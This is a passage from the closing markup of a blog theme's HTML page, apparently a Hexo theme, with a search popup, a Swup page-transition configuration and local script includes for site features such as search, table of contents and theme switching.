                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fa-solid fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>



    
<script src="/js/tools/localSearch.js" type="module"></script>




    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>








    
<script src="/js/libs/anime.min.js"></script>





    
<script src="/js/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/layouts/essays.js" type="module" data-swup-reload-script=""></script>




</body>
</html>
